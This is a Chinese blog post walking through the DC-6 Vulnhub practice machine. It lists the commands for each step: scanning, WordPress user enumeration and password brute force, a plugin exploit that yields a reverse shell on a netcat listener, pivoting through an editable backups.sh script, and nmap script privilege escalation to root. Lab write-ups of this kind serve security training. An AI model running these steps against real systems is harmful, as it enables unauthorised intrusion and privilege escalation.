DC-6 靶场记录

已于 2023-07-30 11:22:42 修改
阅读量82 收藏 1
点赞数 1
文章标签: 网络安全 安全 web安全
于 2023-06-04 21:45:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52729465/article/details/131030668
版权
文章描述了一位安全专家如何使用nmap进行网络扫描,发现并利用Wordy内容管理系统的漏洞,通过WPScan获取用户和密码,进行SSH连接并切换用户,最终通过编写和执行脚本实现权限提升,达到获取root权限的过程。
摘要由CSDN通过智能技术生成

首先先进行常规操作
发现靶机的MAC地址
在这里插入图片描述
用sudo arp-scan -l
找到靶机的IP 192.168.1.107
进行扫描:
nmap -sT --min-rate 10000 -p- 192.168.1.107
nmap -sT -sC -sV -O -p22,80 192.168.1.107
漏洞探测扫描:
nmap --script=vuln -p22,80 192.168.1.107

先查看80端口,发现无法进入
vim /etc/hosts
加入 192.168.1.107 wordy
成功进入

进入后发现是个wordy的内容管理器
且web页面中没什么可利用信息
使用dirb 192.168.1.107 爆破一下子目录
发现有登录界面
使用wpscan --url http://wordy/ -e u
爆破一下用户名
在这里插入图片描述
得到五个用户名admin、mark、graham、sarah、jens
将其放入到user.txt中
在官网获得的信息

得到pass.txt
用wpscan爆破
wpscan --url wordy -U user.txt -P pass.txt
在这里插入图片描述
得到用户名为mark,密码为helpdesk01的用户
登陆成功
在这里插入图片描述
用searchsploit查询一下该插件
searchsploit activitiy monitor
在这里插入图片描述
然后将45274.html下载下来
cp /usr/share/exploitdb/exploits/php/webapps/45274.html 45274.html
vim 45274.html
根据文件保留我们要用的html文件
在这里插入图片描述
在kali端监听9999
nc -lvnp 9999
在这里插入图片描述
使用python -c 'import pty;pty.spawn(“/bin/bash”)'提高交互性
在这里插入图片描述
在mark的stuff目录下找到一个things-to-do.txt
查看发现有graham的账号密码
用ssh连接一下

成功登录
在这里插入图片描述
在这里插入图片描述
使用 echo “/bin/bash” >> backups.sh 将/bin/bash写入backups.sh中
sudo -u jens ./backups.sh 执行该文件
成功切换为jens用户
在这里插入图片描述
在这里插入图片描述
发现可以用nmap进行提权
echo ‘os.execute(“/bin/bash”)’>getroot.sh
sudo nmap --script=getroot.sh //nmap–script 参数可以执行脚本
在这里插入图片描述
提权成功
cd到root目录下找flag即可完成
在这里插入图片描述

ke1yy
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
DC-6靶场
qq_49518993的博客
08-31 1221
DC-6靶场
我与靶场二三事——DC-1靶场尝试
qq_48413575的博客
01-27 3660
使用nmap扫描当前网段确定靶机ip为:192.168.0.102 发现开放80端口,尝试访问。 发现是一个drupal的cms,先扫描一下看看。 扫描的时候先测试一下网站的功能。 登录不进去,等扫描器结果。 发现了个CVE-2018-7600远程代码执行漏洞,可以利用一下。 使用msf 设置目标地址 查看权限及所在路径。 使用ls看看有啥东西没。 发现flag1,看看。 Every good CMS needs a config file - and so...
wpscan工具简介与使用
永远是少年
12-29 2869
今天继续给大家介绍渗透测试相关知识,本文主要内容是wpscan工具简介与使用。 一、wpscan工具简介 二、wpscan工具使用
DC-6靶场实战
最新发布
qq_42754807的博客
03-26 1064
DC-6靶场实战
DC-6靶场练习
weixin_52985767的博客
12-27 522
DC-6靶场复现
vulnhub靶场DC-6
qq_58091216的博客
01-11 1177
只有一个flag。
我与靶场二三事——DC-2靶场尝试
qq_48413575的博客
02-13 3306
dc-2靶场学习记录
打穿内网之Vulntarget-a靶场实战记录
tpaer的博客
11-11 2515
内容包括:通达OA未授权上传+文件包含RCE、Redis未授权写马、ms17-010永恒之蓝、代理转发内网跳板、CVE-2020-1472 域控杀器Zerologon、wmiexec/smbexec横向移动、cobalt strike与msf的shell传递
VnlnHub DC-6
weixin_45682839的博客
04-23 2981
VnlnHub DC-6通关攻略记录
记录使用kali(靶场DC-1)
qq_40033685的博客
02-20 96
靶场DC-1
DC-6靶机详细渗透过程
MRS_jianai的博客
12-21 816
DC-6靶机详细渗透过程
DC6靶场渗透流程(超详细)
m0_64583632的博客
04-10 986
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。
靶机7 DC-6(过程超详细)
honest_gg的博客
09-26 2913
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场
DC6靶场通关详细记录
博客
12-19 1122
主机靶场DC6通关详细记录
DC-6靶机做题记录
Fab1an的博客
01-21 1292
hosts文件域名解析对WordPress的了解程度,比如后台是wp-admin,还有一个readme.htmlWordPress的扫描器叫wpscan,以及wpscan的用法,可以百度要会爆破它的用户名和密码,可以用BurpSuite或者wpscan去爆破,也可以用hydra或者其他的一些方式进入后台找寻一个能写php代码的地方,把shell弹回来找到一个插件的漏洞,然后用它来反弹shellnamp提权,用nse脚本提权。
Vulnhub系列之DC6靶场详解
weixin_50053818的博客
05-27 1236
文章目录环境爆破拿后台密码 环境 vulhub系列之DC6靶场 VMware虚拟机 kali 爆破拿后台密码 根据目标靶机MAC地址得到目标IP:192.168.43.60,直接上nmap扫描。 开启了22和80两个端口号,并且需要指定域名解析才可以访问网页,直接在`/etc/hosts`下写入`192.168.43.60 wordy`即可。 进入网站可以知道CMS为wordpress 5.1.1,直接wpscan扫描。 扫描出5个用户,把五个用户写入user
Vulhub 靶场训练 DC-6解析
黑战士的博客
02-23 1085
提示用kali自带的字典rockyou.txt导出包含k01的密码导出来的字典爆破(没解压的先解压,我之前解压过了)# nmap提权:以root的权限用nmap执行这个脚本,打开root shell的文件,再让nmap执行。第一:利用目录扫描工具寻找该CMS的后台管理系统,然后再爆破密码和账号,进入后台管理系统寻找可利用的点。进入/home/jens目录,打开backups.sh文件,里面是一个压缩命令行,说明该文件可以运行。可以在该文件中添加/bin/bash语句,则可以打开jens的shell了。
DC-6靶场渗透】
一纸荒芜的博客
01-16 1240
DC6靶场渗透
DC-1靶场攻防:信息收集与Drupal漏洞挖掘
"DC-1靶场的攻防演练教程" 在网络安全领域,靶场是进行安全测试和技能提升的重要平台。本教程聚焦于名为DC-1的靶机,通过一系列步骤来展示如何找到并利用靶机上的漏洞来获取flag。下面我们将详细探讨这个过程。 ...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值